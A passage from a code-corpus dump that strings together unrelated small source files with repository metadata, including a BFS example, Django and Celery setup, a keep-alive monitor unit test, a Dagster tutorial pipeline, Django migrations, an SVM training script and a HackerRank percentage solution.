label_list, predict_list, average='macro'))
print("f1_score:", f1_score(label_list, predict_list, average='macro'))
print("recall_score:", recall_score(
label_list, predict_list, average='macro'))
if __name__ == "__main__":
main()
|
[
"danielhcomerio@gmail.com"
] |
danielhcomerio@gmail.com
|
0a16de60999fd20f560463fbf91ef269d48e50c2
|
8bb9e879366fe91e5131f36f32784f7310ebb6ef
|
/Scripts/Breadth_First_Search.py
|
e1b6eacb7459db6db2cb26cc0702244debb43caa
|
[] |
no_license
|
rickmunene/Algorithms_And_Data_Structures
|
af4585aeffdbe1ed02894403b5fbf82476d2fd5c
|
eb5a12f5012ef3e1e190f06e0cb102046a3af5e0
|
refs/heads/main
| 2023-02-20T01:02:32.505447
| 2021-01-05T09:51:30
| 2021-01-05T09:51:30
| null | 0
| 0
| null | null | null | null |
UTF-8
|
Python
| false
| false
| 799
|
py
|
class Node:
def __init__(self, name):
self.name = name
self.adjacency_list = []
self.visited = False
def breadth_first_search(start_node):
queue = [start_node]
while queue:
actual_node = queue.pop(0)
actual_node.visited = True
print(actual_node.name)
for n in actual_node.adjacency_list:
if not n.visited:
queue.append(n)
if __name__== '__main__':
node1 = Node('A')
node2 = Node('b')
node3 = Node('C')
node4 = Node('D')
node5 = Node('E')
node1.adjacency_list.append(node2)
node1.adjacency_list.append(node3)
node2.adjacency_list.append(node4)
node4.adjacency_list.append(node5)
breadth_first_search(node1)
|
[
"noreply@github.com"
] |
rickmunene.noreply@github.com
|
a00e26b96aa832dc6274eea833daef5105f4ee2f
|
085baa87309809725098dcc614d670af6b2f5048
|
/ref-mac0350/mac0350fase3/atividade/apps.py
|
73b651708cc7e2f0b6aceeaacb2bd532130f3aa7
|
[] |
no_license
|
EdyKnopfler/mac0439-fase2
|
a9a6e1dbca2f7f81356061fc381f6f0d3851fbe3
|
7d4aa9cb80c90741932c83f6679332e307bbcbb6
|
refs/heads/master
| 2020-03-17T19:16:25.034351
| 2018-05-20T18:57:02
| 2018-05-20T18:57:02
| 133,852,866
| 0
| 0
| null | null | null | null |
UTF-8
|
Python
| false
| false
| 158
|
py
|
# -*- coding: utf-8 -*-
from __future__ import unicode_literals
from django.apps import AppConfig
class AtividadeConfig(AppConfig):
name = 'atividade'
|
[
"ederson_cassio@yahoo.com.br"
] |
ederson_cassio@yahoo.com.br
|
13117c480aab101095108b73f28b0030d78c8704
|
010ebe5a10990c6e6bd0063012ec13f3d47c28ab
|
/tests/notifier/test_keep_alive_monitor.py
|
1cfc22dd1081c25b15893ad5f64213d58ee4f262
|
[
"MIT"
] |
permissive
|
amaier17/chiadog
|
f81dd5da51b3b9f8364d79adb4f6e0c545037781
|
e927c5806400353dca1401c7cfab9fa7571c03bd
|
refs/heads/main
| 2023-07-31T14:21:25.835620
| 2021-09-19T00:22:42
| 2021-09-19T00:22:42
| 407,995,978
| 1
| 0
|
MIT
| 2021-09-19T00:22:09
| 2021-09-19T00:22:08
| null |
UTF-8
|
Python
| false
| false
| 2,175
|
py
|
# std
import logging
import unittest
from datetime import datetime
from time import sleep
from typing import List
# project
from src.notifier import Event, EventService, EventType, EventPriority
from src.notifier.keep_alive_monitor import KeepAliveMonitor
logging.basicConfig(level=logging.DEBUG)
class DummyNotifyManager:
def __init__(self, callback):
self._callback = callback
def process_events(self, events: List[Event]):
if self._callback:
self._callback(events)
class TestKeepAliveMonitor(unittest.TestCase):
def setUp(self) -> None:
self.threshold_seconds = 3
self.keep_alive_monitor = KeepAliveMonitor(thresholds={EventService.HARVESTER: self.threshold_seconds})
self.keep_alive_event = Event(
type=EventType.KEEPALIVE, priority=EventPriority.NORMAL, service=EventService.HARVESTER, message=""
)
def tearDown(self) -> None:
self.keep_alive_monitor.stop()
def testBasic(self):
received_high_priority_event = False
def callback(events: List[Event]):
nonlocal received_high_priority_event
self.assertEqual(len(events), 1, "Unexpected number of events")
self.assertEqual(events[0].type, EventType.USER, "Unexpected event type")
self.assertEqual(events[0].priority, EventPriority.HIGH, "Unexpected event priority")
received_high_priority_event = True
notify_manager = DummyNotifyManager(callback)
self.keep_alive_monitor.set_notify_manager(notify_manager)
begin_tp = datetime.now()
for _ in range(self.threshold_seconds):
self.keep_alive_monitor.process_events([self.keep_alive_event])
sleep(1)
while not received_high_priority_event:
logging.info("Waiting for high priority event..")
sleep(1)
end_tp = datetime.now()
seconds_elapsed = (end_tp - begin_tp).seconds
# Check that high priority event did not fire before keep-alive signal stopped
self.assertGreater(seconds_elapsed, 2 * self.threshold_seconds - 1)
if __name__ == "__main__":
unittest.main()
|
[
"3739458+martomi@users.noreply.github.com"
] |
3739458+martomi@users.noreply.github.com
|
42131b454a17a5da23811e51276bfadfee0f92f9
|
36f7dc938fafbca60693119a902b2faedc6a986b
|
/core/celery.py
|
c4cc61c55f75d86be31edd9f9e819b633c7cb44d
|
[] |
no_license
|
okidijimmy200/myShop
|
53227c8c6aaac91fe6973ca8b61d76d78a22044e
|
b7d143480c7010660de7d8b95d5af1ccca1bab0c
|
refs/heads/master
| 2023-01-28T08:26:33.509357
| 2020-11-16T12:14:51
| 2020-11-16T12:14:51
| 301,716,891
| 0
| 0
| null | null | null | null |
UTF-8
|
Python
| false
| false
| 1,194
|
py
|
import os
from celery import Celery
# set the default Django settings module for the 'celery' program.
'''You set the DJANGO_SETTINGS_MODULE variable for the Celery command-line
program.'''
os.environ.setdefault('DJANGO_SETTINGS_MODULE', 'core.settings')
# You create an instance of the application with app = Celery('core').
app = Celery('core')
# --------------------------------------------------------------------------
'''You load any custom configuration from your project settings using the
config_from_object() method. The namespace attribute specifies the
prefix that Celery-related settings will have in your settings.py file.
By setting the CELERY namespace, all Celery settings need to include the
CELERY_ prefix in their name (for example, CELERY_BROKER_URL).'''
app.config_from_object('django.conf:settings', namespace='CELERY')
# --------------------------------------------------------------------------
'''Finally, you tell Celery to auto-discover asynchronous tasks for your
applications. Celery will look for a tasks.py file in each application
directory of applications added to INSTALLED_APPS in order to load
asynchronous tasks defined in it.'''
app.autodiscover_tasks()
|
[
"okidijimmie@gmail.com"
] |
okidijimmie@gmail.com
|
010c30d9d1cdf68caf7d9cd6428c9897431cc718
|
f1961c86e6da14f35c21d7235f4fc8a89fabdcad
|
/DailyProgrammer/DP20160115C.py
|
d3eba687e813c8a24053dabb9857a302f2967953
|
[
"MIT"
] |
permissive
|
DayGitH/Python-Challenges
|
d4930bdd85cd1a977d8f6192775ca956a375fcde
|
bc32f1332a92fcc2dfa6f5ea4d95f8a8d64c3edf
|
refs/heads/master
| 2021-01-17T13:01:03.784523
| 2018-06-29T23:49:04
| 2018-06-29T23:49:04
| 58,497,683
| 2
| 0
| null | null | null | null |
UTF-8
|
Python
| false
| false
| 2,519
|
py
|
"""
[2016-01-15] Challenge #249 [Hard] Museum Cameras
https://www.reddit.com/r/dailyprogrammer/comments/41346z/20160115_challenge_249_hard_museum_cameras/
# Description
You run a museum, and you have a small budget - but you have to protect the museum with cameras. Given some
descriptions of rooms, can you organize the smallest number of cameras to view the whole room?
Some assumptions and other factors for you to work with:
* Cameras can't see around corners.
* You can only place cameras in corners.
* Assume every camera has a field of view of 180 degrees, yielding a semicircular field of view.
* Assume every camera's field of view will be equal to the left and right of the line in the corner where the camera is
placed; this line bisects the angle of the corner. The camera points away from the corner.
* Assume every camera has an otherwise infinite view.
# Input Description
You'll be given a row with a single number *N* that tells you how many points to read. Then on the next line you'll be
given *N* points in a Cartesian coordinate space to draw the bounding box of the museum room. For example:
3
(0,0) (3,6) (6,0)
This translates to (pardon my ugly ASCII art) this triangle:
. .
/ \
=> / \
/ \
/ \
/ \
. . .___________.
# Output Description
Your program should emit the position of the cameras needed to cover the area. From our example:
(0,0)
That's one possible solution (for this one any of the corners would have worked).
If the shape has no solution, emit something like "The architect has no concept of security" because maybe they're
collaborating with art theives.
# Challenge Input
first room
4
(0,0) (5,0) (5,6) (0,6)
second room
5
(0,0) (7,0) (7,3) (5,6) (0,6)
third room
13
(0,5) (2,8) (5,7) (9,6) (10,9) (13,10) (13,6) (17,6) (16,3) (13,1) (7,1) (5,3) (2,3)
# Notes
This is a classic computational geometry problem called the [Art Gallery
Problem](https://en.wikipedia.org/wiki/Art_gallery_problem). For some ideas on calculating 2d visibility from a top
down map, [click here](http://www.redblobgames.com/articles/visibility/)
"""
def main():
pass
if __name__ == "__main__":
main()
|
[
"akber91@gmail.com"
] |
akber91@gmail.com
|
9c62aa02baa94c29ab3ff9da031a47c148765e2a
|
7730da1f3f4c59663bd45ae1934dc0867ce5c75c
|
/src/dao/inspect_task_dao.py
|
ccef139d2b18baf6e62cd60378c0c32b7a77956a
|
[] |
no_license
|
mengshanxi/spider
|
55d8bbc23d5fbd97df4e87b956fee35d4aabb178
|
1f9262a4fa64459fbd2474a7f5849b63cb960271
|
refs/heads/master
| 2022-12-08T16:24:44.118186
| 2020-07-09T14:37:41
| 2020-07-09T14:37:41
| 136,481,034
| 1
| 0
| null | null | null | null |
UTF-8
|
Python
| false
| false
| 274
|
py
|
# coding:utf-8
from dao.db import session
from model.models import InspectTask
class InspectTaskDao(object):
@staticmethod
def get_task(task_id):
inspect_task = session.query(InspectTask).filter(InspectTask.id == task_id).one()
return inspect_task
|
[
"13811668973@163.com"
] |
13811668973@163.com
|
48147c01632bf43930c50ac32358fe0ca0faab7e
|
eeeb4d5fb7f47af61229ac7b5c55e5b9400d5510
|
/authsystemproject/manage.py
|
847ce7776b639a9d76ac5dbe1e8bbcc3b171d455
|
[] |
no_license
|
collinskoech11/authsystemproject
|
050ba9f5239e7676f49ee080bf4cec56bddb9c8d
|
8b5e95de03fc0f92332dbfa3ac0c0c023cbe80ee
|
refs/heads/master
| 2023-06-15T15:40:01.359428
| 2021-07-11T11:23:20
| 2021-07-11T11:23:20
| 378,850,989
| 1
| 0
| null | null | null | null |
UTF-8
|
Python
| false
| false
| 673
|
py
|
#!/usr/bin/env python
"""Django's command-line utility for administrative tasks."""
import os
import sys
def main():
"""Run administrative tasks."""
os.environ.setdefault('DJANGO_SETTINGS_MODULE', 'authsystemproject.settings')
try:
from django.core.management import execute_from_command_line
except ImportError as exc:
raise ImportError(
"Couldn't import Django. Are you sure it's installed and "
"available on your PYTHONPATH environment variable? Did you "
"forget to activate a virtual environment?"
) from exc
execute_from_command_line(sys.argv)
if __name__ == '__main__':
main()
|
[
"collinskoechck34@gmail.com"
] |
collinskoechck34@gmail.com
|
bd64d6030520ad84c31f801060f2e22635741ca1
|
935c3650a6572ade2d06756ab1a53d4b9b2973a8
|
/train_svm.py
|
3cd18b1abb94f826392e13b5dee8083dc810ee5a
|
[] |
no_license
|
impetusengine/Robo_ND_Perception_Project
|
2b1eabb4a446a285f0676eb419453a012eb33ee5
|
a7dc07828fbbf32a727f43d1806787e1688212f4
|
refs/heads/master
| 2021-04-30T15:03:57.182186
| 2018-02-13T11:18:17
| 2018-02-13T11:18:17
| 121,231,327
| 0
| 0
| null | null | null | null |
UTF-8
|
Python
| false
| false
| 4,353
|
py
|
#!/usr/bin/env python
import pickle
import itertools
import numpy as np
import matplotlib.pyplot as plt
from sklearn import svm
from sklearn.preprocessing import LabelEncoder, StandardScaler
from sklearn import cross_validation
from sklearn import metrics
from sklearn.ensemble import RandomForestClassifier
def plot_confusion_matrix(cm, classes,
normalize=False,
title='Confusion matrix',
cmap=plt.cm.Blues):
"""
This function prints and plots the confusion matrix.
Normalization can be applied by setting `normalize=True`.
"""
if normalize:
cm = cm.astype('float') / cm.sum(axis=1)[:, np.newaxis]
plt.imshow(cm, interpolation='nearest', cmap=cmap)
plt.title(title)
plt.colorbar()
tick_marks = np.arange(len(classes))
plt.xticks(tick_marks, classes, rotation=45)
plt.yticks(tick_marks, classes)
thresh = cm.max() / 2.
for i, j in itertools.product(range(cm.shape[0]), range(cm.shape[1])):
plt.text(j, i, '{0:.2f}'.format(cm[i, j]),
horizontalalignment="center",
color="white" if cm[i, j] > thresh else "black")
plt.tight_layout()
plt.ylabel('True label')
plt.xlabel('Predicted label')
# Load training data from disk
test_num = 0
if test_num == 0:
training_set = pickle.load(open('training_set0.sav', 'rb'))
elif test_num == 1:
training_set = pickle.load(open('training_set1.sav', 'rb'))
elif test_num == 2:
training_set = pickle.load(open('training_set2.sav', 'rb'))
elif test_num == 3:
training_set = pickle.load(open('training_set3.sav', 'rb'))
# Format the features and labels for use with scikit learn
feature_list = []
label_list = []
for item in training_set:
if np.isnan(item[0]).sum() < 1:
feature_list.append(item[0])
label_list.append(item[1])
print('Features in Training Set: {}'.format(len(training_set)))
print('Invalid Features in Training set: {}'.format(len(training_set)-len(feature_list)))
X = np.array(feature_list)
# Fit a per-column scaler
X_scaler = StandardScaler().fit(X)
# Apply the scaler to X
X_train = X_scaler.transform(X)
y_train = np.array(label_list)
# Convert label strings to numerical encoding
encoder = LabelEncoder()
y_train = encoder.fit_transform(y_train)
# Create classifier
clf = svm.SVC(kernel='sigmoid')
# Set up 5-fold cross-validation
kf = cross_validation.KFold(len(X_train),
n_folds=5,
shuffle=True,
random_state=1)
# Perform cross-validation
scores = cross_validation.cross_val_score(cv=kf,
estimator=clf,
X=X_train,
y=y_train,
scoring='accuracy'
)
print('Scores: ' + str(scores))
print('Accuracy: %0.2f (+/- %0.2f)' % (scores.mean(), 2*scores.std()))
# Gather predictions
predictions = cross_validation.cross_val_predict(cv=kf,
estimator=clf,
X=X_train,
y=y_train
)
accuracy_score = metrics.accuracy_score(y_train, predictions)
print('accuracy score: '+str(accuracy_score))
confusion_matrix = metrics.confusion_matrix(y_train, predictions)
class_names = encoder.classes_.tolist()
#Train the classifier
clf.fit(X=X_train, y=y_train)
model = {'classifier': clf, 'classes': encoder.classes_, 'scaler': X_scaler}
# Save classifier to disk
if test_num == 0:
pickle.dump(model, open('model0.sav', 'wb'))
elif test_num == 1:
pickle.dump(model, open('model1.sav', 'wb'))
elif test_num == 2:
pickle.dump(model, open('model2.sav', 'wb'))
elif test_num == 3:
pickle.dump(model, open('model3.sav', 'wb'))
# Plot non-normalized confusion matrix
plt.figure()
plot_confusion_matrix(confusion_matrix, classes=encoder.classes_,
title='Confusion matrix, without normalization')
# Plot normalized confusion matrix
plt.figure()
plot_confusion_matrix(confusion_matrix, classes=encoder.classes_, normalize=True,
title='Normalized confusion matrix')
plt.show()
|
[
"noreply@github.com"
] |
impetusengine.noreply@github.com
|
ae363a1608b3f973d17f7f341e063c4143b48008
|
646862bcc35e43c58f2fd6ffbfed7dff5449bec5
|
/Project-6/build_23.py
|
2e115c719cc0b90eedcd8563d555784e599a4f75
|
[] |
no_license
|
kkdave28/Informatics-102-Spring-2018
|
09fe49ec640dd6e2cac7ebffd6bb60dc288a3ee2
|
572cd4a94a3d015ad4f68679c6d855e511a850a4
|
refs/heads/master
| 2020-03-08T07:51:09.651945
| 2018-05-25T22:20:15
| 2018-05-25T22:20:15
| 128,005,214
| 0
| 0
| null | null | null | null |
UTF-8
|
Python
| false
| false
| 74
|
py
|
#!/usr/bin/env python
def main():
proces = "Do no compilation"
main()
|
[
"kkdave@uci.edu"
] |
kkdave@uci.edu
|
3297b38452a0268a4dda64536361fbee8512ea7f
|
179a800968fa260558807a5eaad00977ae2b0260
|
/test.py
|
6d203d238988e6e5827359de4f17ea890a2dd405
|
[] |
no_license
|
gupta93/app_simulator
|
c0d3c05845952a65e546d4bd62c41faa573bf7e3
|
94f67377e2a399e84c93b4bc34d7a3cd13cd37bb
|
refs/heads/master
| 2021-01-23T14:18:18.505808
| 2017-06-03T13:51:31
| 2017-06-03T13:51:31
| 93,251,218
| 0
| 0
| null | null | null | null |
UTF-8
|
Python
| false
| false
| 3,971
|
py
|
from odyssey.v2.precomputations.functions import precompute_agent_location_snapshot
from odyssey.v2.precomputations.functions import precompute_dr
from odyssey.v2.precomputations.functions import precompute_drm
from odyssey.v2.precomputations.functions import precompute_member_data
from odyssey.v2.precomputations.functions import precompute_manager_reportee_tree_mapping
from odyssey.v2.precomputations.functions import precompute_mis_member_data
from odyssey.v2.common.utils import send_users
from odyssey.v2.groups.precomputations import create_department_mapping
from odyssey.v2.groups.precomputations import create_region_mapping
from odyssey.v2.precomputations.functions import precompute_day_wise_last_location
from odyssey.v2.periodic_mails.functions import send_inactive_members_email
from odyssey.v2.precomputations.functions import precompute_admin_member_access
import datetime
f = open('time_log_precompute.log','a')
f1 = open('error.log','a')
def master_function():
try:
start = datetime.datetime.now()
precompute_agent_location_snapshot()
f.write('\n \n Agent Location Snapshot : '+str((datetime.datetime.now()-start).total_seconds()))
except:
f1.write('\n \nerror in Agent Location Snapshot')
pass
try:
start = datetime.datetime.now()
precompute_drm()
f.write('\n \n Precompute Drm : '+str((datetime.datetime.now()-start).total_seconds()))
except:
f1.write('\n \n error in Precompute Drm')
pass
try:
start = datetime.datetime.now()
precompute_dr()
f.write('\n \n Precompute Dr: '+str((datetime.datetime.now()-start).total_seconds()))
except:
f1.write('\n \n error in Precompute Dr')
pass
try:
start = datetime.datetime.now()
precompute_member_data()
f.write('\n \n Precompute Member Data : '+str((datetime.datetime.now()-start).total_seconds()))
except:
f1.write('\n \n error in Precompute Membr data')
pass
try:
start = datetime.datetime.now()
precompute_manager_reportee_tree_mapping()
f.write('\n \n Precompute Manager Report : '+str((datetime.datetime.now()-start).total_seconds()))
except:
f1.write('\n \n error in Manager report')
pass
try:
start = datetime.datetime.now()
precompute_mis_member_data()
f.write('\n \n Precompute MIS : '+str((datetime.datetime.now()-start).total_seconds()))
except:
f1.write('\n \n error in Precompute MIS')
pass
try:
start = datetime.datetime.now()
send_users()
f.write('\n \n Precompute Send Users : '+str((datetime.datetime.now()-start).total_seconds()))
except:
f1.write('\n \n error in Precompute send users')
pass
try:
start = datetime.datetime.now()
create_department_mapping()
f.write('\n \n Department Mapping : '+str((datetime.datetime.now()-start).total_seconds()))
except:
f1.write('\n \n error in Precompute dept mappng')
pass
try:
start = datetime.datetime.now()
create_region_mapping()
f.write('\n \n Region Mapping : '+str((datetime.datetime.now()-start).total_seconds()))
except:
f1.write('\n \n error in Precompute region mappping')
pass
try:
start = datetime.datetime.now()
precompute_day_wise_last_location()
f.write('\n \n Precompute Day Wise Last Location : '+str((datetime.datetime.now()-start).total_seconds()))
except:
f1.write('\n \n error in Precompute day wise last loc')
pass
try:
start = datetime.datetime.now()
precompute_admin_member_access()
f.write('\n \n Precompute Admin Member Access : '+str((datetime.datetime.now()-start).total_seconds()))
except:
f1.write('\n \n error in Precompute admin member access')
pass
|
[
"tushar@loktra.com"
] |
tushar@loktra.com
|
181f341b896016c1f672560c2623e19da3e7c974
|
754ac8f084839c9c42a38c3e6541140984792600
|
/lib/utils.py
|
0e00b50d6f8c2f45f552ce1430e3d0b5a708057d
|
[] |
no_license
|
chihfenl/spark-practice-mm
|
356da941576094aa816072d6bf617e33c16d8ecf
|
a5c0d8df74f84cdfe7d85fabd114426c5a5a8537
|
refs/heads/master
| 2021-06-20T00:07:39.132916
| 2017-06-26T17:43:36
| 2017-06-26T17:43:36
| null | 0
| 0
| null | null | null | null |
UTF-8
|
Python
| false
| false
| 1,135
|
py
|
import os
import sys
def remove_timestamp_within_time_range(timestamp_list, second_of_range):
result = []
timestamp_list = sorted(timestamp_list)
if len(timestamp_list) > 1:
current_timesatmp = timestamp_list[0]
group_start_index = 0
while current_timesatmp:
end_time = current_timesatmp + second_of_range
current_group = [
timestamp for timestamp in timestamp_list[group_start_index:]
if timestamp <= end_time
]
result.append(min(current_group))
group_start_index = timestamp_list.index(current_group[-1]) + 1
current_timesatmp = (
timestamp_list[group_start_index]
if group_start_index < len(timestamp_list) else None
)
else:
return timestamp_list
return result
def get_timestamp_less_than_target(timestamp_list, target):
result = []
target = int(target)
for timestamp in timestamp_list:
timestamp = int(timestamp)
if timestamp < target:
result.append(timestamp)
return result
|
[
"chihfeng.lin@bomoda.com"
] |
chihfeng.lin@bomoda.com
|
be8c32790f5c70150a3f641ba5a23666ce857a6f
|
cdd33a31d5b57a4a02803dded5e96a815fbb06d7
|
/examples/dagster_examples/intro_tutorial/serialization_strategy.py
|
828ccd9259a3982d5d826585b2dfb8b6f2819126
|
[
"Apache-2.0"
] |
permissive
|
david-alexander-white/dagster
|
4f177c167150316a5056901aa2522ab778d1d163
|
1c341500bb2380e14873b59b7e25503270188bda
|
refs/heads/master
| 2020-12-07T04:40:02.676080
| 2020-01-06T17:37:40
| 2020-01-07T22:19:01
| 232,633,648
| 1
| 0
|
Apache-2.0
| 2020-01-08T18:42:28
| 2020-01-08T18:42:27
| null |
UTF-8
|
Python
| false
| false
| 2,132
|
py
|
import csv
from dagster import (
SerializationStrategy,
dagster_type,
execute_pipeline,
pipeline,
solid,
)
class CsvSerializationStrategy(SerializationStrategy):
def __init__(self):
super(CsvSerializationStrategy, self).__init__(
'csv_strategy', read_mode='r', write_mode='w'
)
def serialize(self, value, write_file_obj):
fieldnames = value[0]
writer = csv.DictWriter(write_file_obj, fieldnames)
writer.writeheader()
writer.writerows(value)
def deserialize(self, read_file_obj):
reader = csv.DictReader(read_file_obj)
return LessSimpleDataFrame([row for row in reader])
@dagster_type(
name='LessSimpleDataFrame',
description=(
'A naive representation of a data frame, e.g., as returned by '
'csv.DictReader.'
),
serialization_strategy=CsvSerializationStrategy(),
)
class LessSimpleDataFrame(list):
pass
@solid
def read_csv(context, csv_path: str) -> LessSimpleDataFrame:
with open(csv_path, 'r') as fd:
lines = [row for row in csv.DictReader(fd)]
context.log.info('Read {n_lines} lines'.format(n_lines=len(lines)))
return LessSimpleDataFrame(lines)
@solid
def sort_by_calories(context, cereals: LessSimpleDataFrame):
sorted_cereals = sorted(cereals, key=lambda cereal: cereal['calories'])
context.log.info(
'Least caloric cereal: {least_caloric}'.format(
least_caloric=sorted_cereals[0]['name']
)
)
context.log.info(
'Most caloric cereal: {most_caloric}'.format(
most_caloric=sorted_cereals[-1]['name']
)
)
return LessSimpleDataFrame(sorted_cereals)
@pipeline
def serialization_strategy_pipeline():
sort_by_calories(read_csv())
if __name__ == '__main__':
environment_dict = {
'solids': {
'read_csv': {'inputs': {'csv_path': {'value': 'cereal.csv'}}}
},
'storage': {'filesystem': {}},
}
result = execute_pipeline(
serialization_strategy_pipeline, environment_dict=environment_dict
)
assert result.success
|
[
"max.gasner@gmail.com"
] |
max.gasner@gmail.com
|
f4a5f6929002096e27657e7a177ea188152b21f7
|
a10bd7af354d1aeef13ebfd786fc9e8054b661b6
|
/ely_db/energia/.migrations/0001_initial.py
|
d86307935cae47da3ea9515136adb5427099f5d9
|
[] |
no_license
|
xtornasol512/djdbmysql
|
b2bea1cde172a34bebb9cb82c7306d6a9f436e15
|
05d263899410662d9854cb788b3c018b3cb4f72a
|
refs/heads/master
| 2021-01-10T01:12:07.710385
| 2015-10-22T10:16:05
| 2015-10-22T10:16:05
| 44,737,669
| 0
| 0
| null | null | null | null |
UTF-8
|
Python
| false
| false
| 4,507
|
py
|
# -*- coding: utf-8 -*-
from __future__ import unicode_literals
from django.db import models, migrations
class Migration(migrations.Migration):
dependencies = [
]
operations = [
migrations.CreateModel(
name='Compra_de_Plutonio',
fields=[
('id', models.AutoField(verbose_name='ID', serialize=False, auto_created=True, primary_key=True)),
('cantidad', models.FloatField()),
('fecha_entrega', models.DateTimeField()),
],
),
migrations.CreateModel(
name='Hidroelectrica',
fields=[
('id', models.AutoField(verbose_name='ID', serialize=False, auto_created=True, primary_key=True)),
('ocupacion', models.CharField(max_length=50)),
('capacidad_maxima', models.FloatField()),
('num_turbinas', models.IntegerField()),
],
),
migrations.CreateModel(
name='Nuclear',
fields=[
('id', models.AutoField(verbose_name='ID', serialize=False, auto_created=True, primary_key=True)),
('plutonio', models.FloatField()),
('num_reactores', models.IntegerField()),
('num_residuos', models.IntegerField()),
],
),
migrations.CreateModel(
name='Productor',
fields=[
('id', models.AutoField(verbose_name='ID', serialize=False, auto_created=True, primary_key=True)),
('nombre', models.CharField(unique=True, max_length=50)),
('produccion_media', models.FloatField()),
('produccion_maxima', models.FloatField()),
('f_entrada', models.DateTimeField()),
],
),
migrations.CreateModel(
name='Solar',
fields=[
('id', models.AutoField(verbose_name='ID', serialize=False, auto_created=True, primary_key=True)),
('tipo_energia', models.CharField(default=b'fotovoltaica', max_length=20, choices=[(b'fotovoltaica', b'Fotovoltaica'), (b'termodinamica', b'Termodin\xc3\xa1mica')])),
('num_paneles_solares', models.IntegerField()),
('media_anual_hrs_sol', models.IntegerField()),
('productor', models.ForeignKey(to='energia.Productor')),
],
),
migrations.CreateModel(
name='Suministrador',
fields=[
('id', models.AutoField(verbose_name='ID', serialize=False, auto_created=True, primary_key=True)),
('nombre', models.CharField(max_length=50)),
('pais', models.CharField(max_length=50)),
('plantas_nucleares', models.ManyToManyField(to='energia.Nuclear')),
],
),
migrations.CreateModel(
name='Termica',
fields=[
('id', models.AutoField(verbose_name='ID', serialize=False, auto_created=True, primary_key=True)),
('num_hornos', models.IntegerField()),
('volumen_carbon_consumido', models.FloatField()),
('productor', models.ForeignKey(to='energia.Productor')),
],
),
migrations.CreateModel(
name='Transportista',
fields=[
('id', models.AutoField(verbose_name='ID', serialize=False, auto_created=True, primary_key=True)),
('nombre', models.CharField(max_length=50)),
('direccion', models.CharField(max_length=100)),
],
),
migrations.AddField(
model_name='nuclear',
name='productor',
field=models.ForeignKey(to='energia.Productor'),
),
migrations.AddField(
model_name='hidroelectrica',
name='productor',
field=models.ForeignKey(to='energia.Productor'),
),
migrations.AddField(
model_name='compra_de_plutonio',
name='planta_nuclear',
field=models.ForeignKey(to='energia.Nuclear'),
),
migrations.AddField(
model_name='compra_de_plutonio',
name='suministrador',
field=models.ForeignKey(to='energia.Suministrador'),
),
migrations.AddField(
model_name='compra_de_plutonio',
name='transportista',
field=models.ForeignKey(to='energia.Transportista'),
),
]
|
[
"xtornasol512@gmail.com"
] |
xtornasol512@gmail.com
|
6ffbcb87ba74b9993f4633ebf8df5139e8f479c8
|
b7e4b737b41d74ff9070246a6d2d3f39a3395016
|
/stuff/notes/lambda-course/test.py
|
12b507b96eecef584b08efce7149816216ab2f09
|
[] |
no_license
|
sanjay51/ixtutor
|
52ac8f03215bbaedf91cf85e973f0700ca9ad624
|
0c0a18bc656c79633d45de28bbc6bcde12370462
|
refs/heads/master
| 2021-01-18T20:07:46.506728
| 2017-01-08T18:48:17
| 2017-01-08T18:48:17
| 86,939,397
| 1
| 0
| null | null | null | null |
UTF-8
|
Python
| false
| false
| 294
|
py
|
# createCourse
{
"httpMethod": "GET",
"queryStringParameters": {
"operation": "createCourse",
"category": "ProgrammingLanguage",
"title": "Some title here",
"oneLineDescription": "Learn some basics",
"description": "This is a detailed description",
"author": 1
}
}
|
[
"sanjay.verma.nitk@gmail.com"
] |
sanjay.verma.nitk@gmail.com
|
b27fcba9d4de8591a010f9aadd890add6f1a1202
|
1eb4645a93dc50e3075d70207271ab69584204f1
|
/python/imp-finding_percentage.py
|
ee1994b9f9b2f9ba1415493bcefecdef96d40fa9
|
[] |
no_license
|
towfeeqfayaz11/hr_python
|
4c4a5cb2b53b10909dc6c602e01c448498c3a187
|
8070cb940afdca3d6eabccb543b5c3219254584b
|
refs/heads/master
| 2023-06-20T06:17:17.029982
| 2021-07-11T15:37:59
| 2021-07-11T15:37:59
| 343,180,961
| 0
| 0
| null | null | null | null |
UTF-8
|
Python
| false
| false
| 1,681
|
py
|
# Problem: Finding the percentage ==> easy
# The provided code stub will read in a dictionary containing key/value pairs of name:[marks] for a list of students. Print the average of the marks
# array for the student name provided, showing 2 places after the decimal.
# Example
# marks key:value pairs are
# 'alpha':[20,30,40]
# 'beta':[30,50,70]
# query_name = 'beta'
# The query_name is 'beta'. beta's average score is .
# Input Format
# The first line contains the integer , the number of students' records. The next lines contain the names and marks obtained by a student, each value
# separated by a space. The final line contains query_name, the name of a student to query.
# Constraints
# 2<=n<=10
# 0<=marks[i]<=100
# length of marks array =3
# Output Format
# Print one line: The average of the marks obtained by the particular student correct to 2 decimal places.
# Sample Input 0
# 3
# Krishna 67 68 69
# Arjun 70 98 63
# Malika 52 56 60
# Malika
# Sample Output 0
# 56.00
# Explanation 0
# Marks for Malika are whose average is
# Sample Input 1
# 2
# Harsh 25 26.5 28
# Anurag 26 28 30
# Harsh
# Sample Output 1
# 26.50
# solutions:
# solution(1):
if __name__ == '__main__':
n = int(input())
student_marks = {}
for _ in range(n):
name, *line = input().split()
scores = list(map(float, line))
student_marks[name] = scores
query_name = input()
result = student_marks[query_name]
print('{0:.2f}'.format(sum(result)/len(result)))
# solution(2):
marks = {}
for _ in range(int(input())):
line = input().split()
marks[line[0]] = list(map(float, line[1:]))
print('%.2f' %(sum(marks[input()])/3))
|
[
"towfeeqpandith@gmail.com"
] |
towfeeqpandith@gmail.com
|
04b01957fe6d7f618c2f1fcb9e8494f21ae08e21
|
bf0f5c9d5e25bb914e85e554e25a5aafac99190b
|
/node_modules/watchpack-chokidar2/node_modules/fsevents/build/config.gypi
|
49706aafc965e4f438ddeb0c5230a0c7523f61ca
|
[
"MIT"
] |
permissive
|
Rambeur/ecom
|
08c34b4431cca2f4344be4cc62f001b59c5415ad
|
f934ccbd99d0291c495b3c211a38b678b31fdb7f
|
refs/heads/master
| 2023-01-02T01:01:24.685910
| 2020-10-25T18:26:07
| 2020-10-25T18:26:07
| 307,163,812
| 0
| 0
| null | null | null | null |
UTF-8
|
Python
| false
| false
| 5,586
|
gypi
|
# Do not edit. File was generated by node-gyp's "configure" step
{
"target_defaults": {
"cflags": [],
"default_configuration": "Release",
"defines": [],
"include_dirs": [],
"libraries": []
},
"variables": {
"asan": 0,
"build_v8_with_gn": "false",
"coverage": "false",
"dcheck_always_on": 0,
"debug_nghttp2": "false",
"debug_node": "false",
"enable_lto": "false",
"enable_pgo_generate": "false",
"enable_pgo_use": "false",
"error_on_warn": "false",
